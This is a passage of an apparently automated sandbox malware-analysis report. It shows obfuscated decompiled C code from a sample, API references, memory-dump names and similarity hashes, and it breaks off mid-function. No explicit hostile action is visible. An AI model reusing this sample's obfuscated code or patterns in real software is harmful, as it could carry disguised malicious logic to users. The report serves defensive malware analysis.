                                                                                                                                                                                                                                                                            						FindFirstFileA(_v72, _v68);
                                                                                                                                                                                                                                                                            						 *0x00FBAF69 = (_a4[0x26] ^ 0x0000283a) + 0x00002506 ^  *0x00FBAF69;
                                                                                                                                                                                                                                                                            						_v76 = _v36 + 0x2674;
                                                                                                                                                                                                                                                                            						GetModuleHandleA(_v76);
                                                                                                                                                                                                                                                                            						_v96 = _v20 + _v20 ^ _v12;
                                                                                                                                                                                                                                                                            						_v92 = _a4[0x20] +  *0x0040D454 & _v12;
                                                                                                                                                                                                                                                                            						_v88 = (_v28 & 0x00002506) * 0x2506;
                                                                                                                                                                                                                                                                            						_v84 = _a4;
                                                                                                                                                                                                                                                                            						_t367 =  *0x40d3a8; // 0x1dfde0
                                                                                                                                                                                                                                                                            						_v80 = _t367 & _v12;
                                                                                                                                                                                                                                                                            						_t227 = E00372630(_v96, _v92, _v88, _v84, _v80);
                                                                                                                                                                                                                                                                            						_t422 = _t422 + 0x14;
                                                                                                                                                                                                                                                                            						_v24 = _t227;
                                                                                                                                                                                                                                                                            						_a4[0x2eb72a] = ((_v24 | _v16) ^  *0x00FBAFE1) + _a4[0x2eb72a];
                                                                                                                                                                                                                                                                            						_a4[0x19] = _a4[0x19] - _a4[0x26] + _v8;
                                                                                                                                                                                                                                                                            						 *0x40d440 = (_v28 | 0x000026e5) - _v24 ^  *0x40d440;
                                                                                                                                                                                                                                                                            						_v32 = _v32 + 2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v8 = _v8 ^ 0x00000d5f;
                                                                                                                                                                                                                                                                            					 *_a4 = 0;
                                                                                                                                                                                                                                                                            					_t381 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t381 + 0xbadbb1) = 0;
                                                                                                                                                                                                                                                                            					_a4[5] = 1;
                                                                                                                                                                                                                                                                            					_a4[0xa] = 0;
                                                                                                                                                                                                                                                                            					_a4[0xc] = 0;
                                                                                                                                                                                                                                                                            					 *0x00FBAF8D = 0;
                                                                                                                                                                                                                                                                            					 *0x0040D3F4 = 0;
                                                                                                                                                                                                                                                                            					_a4[0x17] = 1;
                                                                                                                                                                                                                                                                            					_a4[0x19] = 4;
                                                                                                                                                                                                                                                                            					 *0x0040D414 = 0x11;
                                                                                                                                                                                                                                                                            					 *0x40d428 = 0;
                                                                                                                                                                                                                                                                            					_a4[0x2eb70c] = 0;
                                                                                                                                                                                                                                                                            					 *0x0040D434 = 0;
                                                                                                                                                                                                                                                                            					 *0x40d440 = 0;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(0x40d454)) = 0x13;
                                                                                                                                                                                                                                                                            					 *0x40d45c = 0;
                                                                                                                                                                                                                                                                            					_a4[0x2e] = 0;
                                                                                                                                                                                                                                                                            					_a4[0x32] = 1;
                                                                                                                                                                                                                                                                            					 *0x40d478 = 0xa;
                                                                                                                                                                                                                                                                            					_a4[0x38] = 6;
                                                                                                                                                                                                                                                                            					_t245 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t245 + 0xe4)) = 0x62;
                                                                                                                                                                                                                                                                            					_a4[0x3d] = 0;
                                                                                                                                                                                                                                                                            					_t246 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t246 + 0xbadca9) = 1;
                                                                                                                                                                                                                                                                            					_a4[0x43] = 1;
                                                                                                                                                                                                                                                                            					 *0x40d4c8 = 1;
                                                                                                                                                                                                                                                                            					_t395 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t60 = _t395 + 0xe0; // 0x6
                                                                                                                                                                                                                                                                            					_t325 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t61 = _t325 + 0xc8; // 0x38f7708d
                                                                                                                                                                                                                                                                            					_t396 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t396 + 0xc8) = (_a4[0x26] -  *_t60 + 0x92e51) *  *_t61;
                                                                                                                                                                                                                                                                            					if(_a4[0x19] < 0x387f) {
                                                                                                                                                                                                                                                                            						_t350 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t69 = _t350 + 0xb4; // 0x367796e2
                                                                                                                                                                                                                                                                            						_t278 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t278 + 0xb4) = (_a4[0x19] + _a4[0x3d] ^ 0x001644fd) *  *_t69;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_a4[0x2eb72a] != _a4[0x1b]) {
                                                                                                                                                                                                                                                                            						_t414 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t77 = _t414 + 0x98; // 0x0
                                                                                                                                                                                                                                                                            						_a4[0x2d] = _a4[0x2d] - ( *_t77 + _a4[0x19] ^ 0x000327c5);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = _v20 ^ 0x000000a5;
                                                                                                                                                                                                                                                                            					_v20 = _v20 - 0x82;
                                                                                                                                                                                                                                                                            					if( *0x40d45c > 0x425f) {
                                                                                                                                                                                                                                                                            						_t413 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t88 = _t413 + 0xd0; // 0x33baa
                                                                                                                                                                                                                                                                            						_t345 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t345 + 0xd0)) =  *_t88 + 0x33ba0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v16 = _v16 + 0x2565;
                                                                                                                                                                                                                                                                            					_v8 = _v8 - 0x1c6;
                                                                                                                                                                                                                                                                            					_v24 = _v24 ^ 0x00002801;
                                                                                                                                                                                                                                                                            					_t401 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					if( *_t401 <= 0x122a8) {
                                                                                                                                                                                                                                                                            						_t411 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t97 = _t411 + 0x98; // 0x0
                                                                                                                                                                                                                                                                            						_a4[0x32] = ( *_a4 +  *_t97 + 0xfb587) * _a4[0x32];
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v64 = 0x40d3a8;
                                                                                                                                                                                                                                                                            					_v60 = _v36 + 0x26e5;
                                                                                                                                                                                                                                                                            					_v56 = _v28 + 0x2622;
                                                                                                                                                                                                                                                                            					_v52 = _v28 + 0x2796;
                                                                                                                                                                                                                                                                            					_v48 = _v16 ^ 0x0000034d;
                                                                                                                                                                                                                                                                            					_v44 = _v8 ^ 0x00000311;
                                                                                                                                                                                                                                                                            					_v40 = _v8 + 0x18d;
                                                                                                                                                                                                                                                                            					_v12 = E00388960(_v64, _v60, _v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                                            					_v8 = _v8 ^ 0x00000311;
                                                                                                                                                                                                                                                                            					_v24 = _v24 ^ 0x00000ee4;
                                                                                                                                                                                                                                                                            					_v16 = _v16 + 0x3b;
                                                                                                                                                                                                                                                                            					_v12 = _v12 + 0x92;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L14:
                                                                                                                                                                                                                                                                            				return _v16 - 0x9a;
                                                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                                                            0x0037294f
                                                                                                                                                                                                                                                                            0x0037295b
                                                                                                                                                                                                                                                                            0x00372964
                                                                                                                                                                                                                                                                            0x0037296f
                                                                                                                                                                                                                                                                            0x0037297b
                                                                                                                                                                                                                                                                            0x00372987
                                                                                                                                                                                                                                                                            0x00372992
                                                                                                                                                                                                                                                                            0x0037299e
                                                                                                                                                                                                                                                                            0x00372d37
                                                                                                                                                                                                                                                                            0x00372d45
                                                                                                                                                                                                                                                                            0x00372d45
                                                                                                                                                                                                                                                                            0x00372d4a
                                                                                                                                                                                                                                                                            0x00372d57
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00372d60
                                                                                                                                                                                                                                                                            0x00372d66
                                                                                                                                                                                                                                                                            0x00372d6c
                                                                                                                                                                                                                                                                            0x00372d73
                                                                                                                                                                                                                                                                            0x00372d7e
                                                                                                                                                                                                                                                                            0x00372d8e
                                                                                                                                                                                                                                                                            0x00372d99
                                                                                                                                                                                                                                                                            0x00372dc8
                                                                                                                                                                                                                                                                            0x00372dd7
                                                                                                                                                                                                                                                                            0x00372dde
                                                                                                                                                                                                                                                                            0x00372ded
                                                                                                                                                                                                                                                                            0x00372e0a
                                                                                                                                                                                                                                                                            0x00372e1c
                                                                                                                                                                                                                                                                            0x00372e22
                                                                                                                                                                                                                                                                            0x00372e25
                                                                                                                                                                                                                                                                            0x00372e2e
                                                                                                                                                                                                                                                                            0x00372e45
                                                                                                                                                                                                                                                                            0x00372e4a
                                                                                                                                                                                                                                                                            0x00372e4d
                                                                                                                                                                                                                                                                            0x00372e7f
                                                                                                                                                                                                                                                                            0x00372e9d
                                                                                                                                                                                                                                                                            0x00372eb2
                                                                                                                                                                                                                                                                            0x00372d42
                                                                                                                                                                                                                                                                            0x00372d42
                                                                                                                                                                                                                                                                            0x003729a4
                                                                                                                                                                                                                                                                            0x003729ad
                                                                                                                                                                                                                                                                            0x003729b3
                                                                                                                                                                                                                                                                            0x003729c0
                                                                                                                                                                                                                                                                            0x003729c6
                                                                                                                                                                                                                                                                            0x003729d9
                                                                                                                                                                                                                                                                            0x003729ec
                                                                                                                                                                                                                                                                            0x003729f7
                                                                                                                                                                                                                                                                            0x00372a05
                                                                                                                                                                                                                                                                            0x00372a17
                                                                                                                                                                                                                                                                            0x00372a24
                                                                                                                                                                                                                                                                            0x00372a2e
                                                                                                                                                                                                                                                                            0x00372a3d
                                                                                                                                                                                                                                                                            0x00372a47
                                                                                                                                                                                                                                                                            0x00372a5c
                                                                                                                                                                                                                                                                            0x00372a6f
                                                                                                                                                                                                                                                                            0x00372a79
                                                                                                                                                                                                                                                                            0x00372a8b
                                                                                                                                                                                                                                                                            0x00372a95
                                                                                                                                                                                                                                                                            0x00372aaa
                                                                                                                                                                                                                                                                            0x00372ab8
                                                                                                                                                                                                                                                                            0x00372ac2
                                                                                                                                                                                                                                                                            0x00372acf
                                                                                                                                                                                                                                                                            0x00372ae1
                                                                                                                                                                                                                                                                            0x00372ae6
                                                                                                                                                                                                                                                                            0x00372af4
                                                                                                                                                                                                                                                                            0x00372b05
                                                                                                                                                                                                                                                                            0x00372b0a
                                                                                                                                                                                                                                                                            0x00372b20
                                                                                                                                                                                                                                                                            0x00372b2b
                                                                                                                                                                                                                                                                            0x00372b38
                                                                                                                                                                                                                                                                            0x00372b44
                                                                                                                                                                                                                                                                            0x00372b4f
                                                                                                                                                                                                                                                                            0x00372b55
                                                                                                                                                                                                                                                                            0x00372b5c
                                                                                                                                                                                                                                                                            0x00372b62
                                                                                                                                                                                                                                                                            0x00372b72
                                                                                                                                                                                                                                                                            0x00372b89
                                                                                                                                                                                                                                                                            0x00372b8f
                                                                                                                                                                                                                                                                            0x00372b96
                                                                                                                                                                                                                                                                            0x00372b9b
                                                                                                                                                                                                                                                                            0x00372b9b
                                                                                                                                                                                                                                                                            0x00372bc1
                                                                                                                                                                                                                                                                            0x00372bc3
                                                                                                                                                                                                                                                                            0x00372bc9
                                                                                                                                                                                                                                                                            0x00372be8
                                                                                                                                                                                                                                                                            0x00372be8
                                                                                                                                                                                                                                                                            0x00372bf6
                                                                                                                                                                                                                                                                            0x00372c02
                                                                                                                                                                                                                                                                            0x00372c0f
                                                                                                                                                                                                                                                                            0x00372c11
                                                                                                                                                                                                                                                                            0x00372c17
                                                                                                                                                                                                                                                                            0x00372c22
                                                                                                                                                                                                                                                                            0x00372c28
                                                                                                                                                                                                                                                                            0x00372c28
                                                                                                                                                                                                                                                                            0x00372c37
                                                                                                                                                                                                                                                                            0x00372c42
                                                                                                                                                                                                                                                                            0x00372c4e
                                                                                                                                                                                                                                                                            0x00372c51
                                                                                                                                                                                                                                                                            0x00372c5d
                                                                                                                                                                                                                                                                            0x00372c64
                                                                                                                                                                                                                                                                            0x00372c6a
                                                                                                                                                                                                                                                                            0x00372c84
                                                                                                                                                                                                                                                                            0x00372c84
                                                                                                                                                                                                                                                                            0x00372c8a
                                                                                                                                                                                                                                                                            0x00372c9a
                                                                                                                                                                                                                                                                            0x00372ca6
                                                                                                                                                                                                                                                                            0x00372cb1
                                                                                                                                                                                                                                                                            0x00372cbd
                                                                                                                                                                                                                                                                            0x00372cc9
                                                                                                                                                                                                                                                                            0x00372cd4
                                                                                                                                                                                                                                                                            0x00372cfb
                                                                                                                                                                                                                                                                            0x00372d0c
                                                                                                                                                                                                                                                                            0x00372d18
                                                                                                                                                                                                                                                                            0x00372d21
                                                                                                                                                                                                                                                                            0x00372d2c
                                                                                                                                                                                                                                                                            0x00372d2c
                                                                                                                                                                                                                                                                            0x00372ebd
                                                                                                                                                                                                                                                                            0x00372ec9

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00372D99
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 00372DDE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFindFirstHandleModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2881114623-0
                                                                                                                                                                                                                                                                            • Opcode ID: d6fd53c187ab1a369dfb9625ccf5b33febd99a0b953ca7b6aea0a09e4251dc6a
                                                                                                                                                                                                                                                                            • Instruction ID: 535599e378d1394c841999a192706655f491fcc07ac6668c49cd48663fbfcc69
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6fd53c187ab1a369dfb9625ccf5b33febd99a0b953ca7b6aea0a09e4251dc6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1302E974A00209DFDB48CF98C594BAEBBB2FF88304F148279D919AB795C735A945CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00372D3C() {
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t142 - 0x1c)) =  *((intOrPtr*)(_t142 - 0x1c)) + 2;
                                                                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                                                                            					_t64 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t3 = _t64 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t142 - 0x1c)) >  *_t3 *  *0x40d440) {
                                                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                                                            						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0xc8));
                                                                                                                                                                                                                                                                            						_t95 =  *0x40d3d8; // 0x0
                                                                                                                                                                                                                                                                            						_t8 = _t67 - 0x2633; // -9779
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x44) = _t95 + _t8;
                                                                                                                                                                                                                                                                            						_t121 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x40) =  *((intOrPtr*)(_t121 + 0x44)) +  *(_t142 - 0x18) &  *(_t142 - 0x18);
                                                                                                                                                                                                                                                                            						FindFirstFileA( *(_t142 - 0x44),  *(_t142 - 0x40));
                                                                                                                                                                                                                                                                            						 *0x00FBAF69 = ( *( *((intOrPtr*)(_t142 + 8)) + 0x98) ^ 0x0000283a) + 0x00002506 ^  *0x00FBAF69;
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x48) =  *((intOrPtr*)(_t142 - 0x20)) + 0x2674;
                                                                                                                                                                                                                                                                            						GetModuleHandleA( *(_t142 - 0x48));
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x5c) =  *((intOrPtr*)(_t142 - 0x10)) +  *((intOrPtr*)(_t142 - 0x10)) ^  *(_t142 - 8);
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x58) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x80)) +  *0x0040D454 &  *(_t142 - 8);
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x54) = ( *(_t142 - 0x18) & 0x00002506) * 0x2506;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t142 - 0x50)) =  *((intOrPtr*)(_t142 + 8));
                                                                                                                                                                                                                                                                            						_t131 =  *0x40d3a8; // 0x1dfde0
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x4c) = _t131 &  *(_t142 - 8);
                                                                                                                                                                                                                                                                            						 *(_t142 - 0x14) = E00372630( *(_t142 - 0x5c),  *(_t142 - 0x58),  *(_t142 - 0x54),  *((intOrPtr*)(_t142 - 0x50)),  *(_t142 - 0x4c));
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0xbadca9)) = (( *(_t142 - 0x14) |  *(_t142 - 0xc)) ^  *0x00FBAFE1) +  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0xbadca9));
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x64)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x64)) -  *( *((intOrPtr*)(_t142 + 8)) + 0x98) +  *((intOrPtr*)(_t142 - 4));
                                                                                                                                                                                                                                                                            						 *0x40d440 = ( *(_t142 - 0x18) | 0x000026e5) -  *(_t142 - 0x14) ^  *0x40d440;
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                                            					return  *(_t142 - 0xc) - 0x9a;
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x00372d3c
                                                                                                                                                                                                                                                                            0x00372d3c
                                                                                                                                                                                                                                                                            0x00372d3c
                                                                                                                                                                                                                                                                            0x00372d42
                                                                                                                                                                                                                                                                            0x00372d45
                                                                                                                                                                                                                                                                            0x00372d45
                                                                                                                                                                                                                                                                            0x00372d4a
                                                                                                                                                                                                                                                                            0x00372d57
                                                                                                                                                                                                                                                                            0x00372d5d
                                                                                                                                                                                                                                                                            0x00372d60
                                                                                                                                                                                                                                                                            0x00372d66
                                                                                                                                                                                                                                                                            0x00372d6c
                                                                                                                                                                                                                                                                            0x00372d73
                                                                                                                                                                                                                                                                            0x00372d7e
                                                                                                                                                                                                                                                                            0x00372d8e
                                                                                                                                                                                                                                                                            0x00372d99
                                                                                                                                                                                                                                                                            0x00372dc8
                                                                                                                                                                                                                                                                            0x00372dd7
                                                                                                                                                                                                                                                                            0x00372dde
                                                                                                                                                                                                                                                                            0x00372ded
                                                                                                                                                                                                                                                                            0x00372e0a
                                                                                                                                                                                                                                                                            0x00372e1c
                                                                                                                                                                                                                                                                            0x00372e22
                                                                                                                                                                                                                                                                            0x00372e25
                                                                                                                                                                                                                                                                            0x00372e2e
                                                                                                                                                                                                                                                                            0x00372e4d
                                                                                                                                                                                                                                                                            0x00372e7f
                                                                                                                                                                                                                                                                            0x00372e9d
                                                                                                                                                                                                                                                                            0x00372eb2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00372eb2
                                                                                                                                                                                                                                                                            0x00372ebd
                                                                                                                                                                                                                                                                            0x00372ec9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00372ec9

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00372D99
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 00372DDE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFindFirstHandleModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2881114623-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9f5d9c11ce9b2ed8adcc4c5ff917dd126101bd35ba1db07791269134df2d813f
                                                                                                                                                                                                                                                                            • Instruction ID: 1697cba3e80c0d05c7e0d9e2d4091a300640721153b06e4f474e8e11907a9010
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f5d9c11ce9b2ed8adcc4c5ff917dd126101bd35ba1db07791269134df2d813f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87512175E00109CFDB18CF98C995EAEBBB1FF88304F148169D919AB795C734A946CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037CFB6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                            				signed int _t172;
                                                                                                                                                                                                                                                                            				signed int _t175;
                                                                                                                                                                                                                                                                            				signed int _t178;
                                                                                                                                                                                                                                                                            				signed int* _t179;
                                                                                                                                                                                                                                                                            				signed int _t195;
                                                                                                                                                                                                                                                                            				signed int _t199;
                                                                                                                                                                                                                                                                            				signed int _t202;
                                                                                                                                                                                                                                                                            				void* _t203;
                                                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                                                            				signed int _t225;
                                                                                                                                                                                                                                                                            				unsigned int* _t240;
                                                                                                                                                                                                                                                                            				signed char _t242;
                                                                                                                                                                                                                                                                            				signed int* _t250;
                                                                                                                                                                                                                                                                            				unsigned int* _t256;
                                                                                                                                                                                                                                                                            				signed int* _t257;
                                                                                                                                                                                                                                                                            				signed char _t259;
                                                                                                                                                                                                                                                                            				long _t262;
                                                                                                                                                                                                                                                                            				signed int* _t265;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				 *(_a4 + 4) = 0;
                                                                                                                                                                                                                                                                            				_t262 = 0xc000000d;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) = 0;
                                                                                                                                                                                                                                                                            				 *(_a4 + 0xc) = 0;
                                                                                                                                                                                                                                                                            				_t242 = _a12;
                                                                                                                                                                                                                                                                            				if((_t242 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                            					_t262 = 0xc000008f;
                                                                                                                                                                                                                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t242 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                            					_t262 = 0xc0000093;
                                                                                                                                                                                                                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t242 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                            					_t262 = 0xc0000091;
                                                                                                                                                                                                                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t242 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            					_t262 = 0xc000008e;
                                                                                                                                                                                                                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t242 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            					_t262 = 0xc0000090;
                                                                                                                                                                                                                                                                            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t265 = _a8;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                                                                                                                                                                                                                            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                                                                                                                                                                                                                                            				_t259 = E0037D488(_a4);
                                                                                                                                                                                                                                                                            				if((_t259 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t259 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t259 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t259 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if((_t259 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t172 =  *_t265 & 0x00000c00;
                                                                                                                                                                                                                                                                            				if(_t172 == 0) {
                                                                                                                                                                                                                                                                            					 *_a4 =  *_a4 & 0xfffffffc;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if(_t172 == 0x400) {
                                                                                                                                                                                                                                                                            						_t257 = _a4;
                                                                                                                                                                                                                                                                            						_t225 =  *_t257 & 0xfffffffd | 1;
                                                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                                                            						 *_t257 = _t225;
                                                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                                                            						_t175 =  *_t265 & 0x00000300;
                                                                                                                                                                                                                                                                            						if(_t175 == 0) {
                                                                                                                                                                                                                                                                            							_t250 = _a4;
                                                                                                                                                                                                                                                                            							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                                                                                                                                                                                                                                            							L35:
                                                                                                                                                                                                                                                                            							 *_t250 = _t178;
                                                                                                                                                                                                                                                                            							L36:
                                                                                                                                                                                                                                                                            							_t179 = _a4;
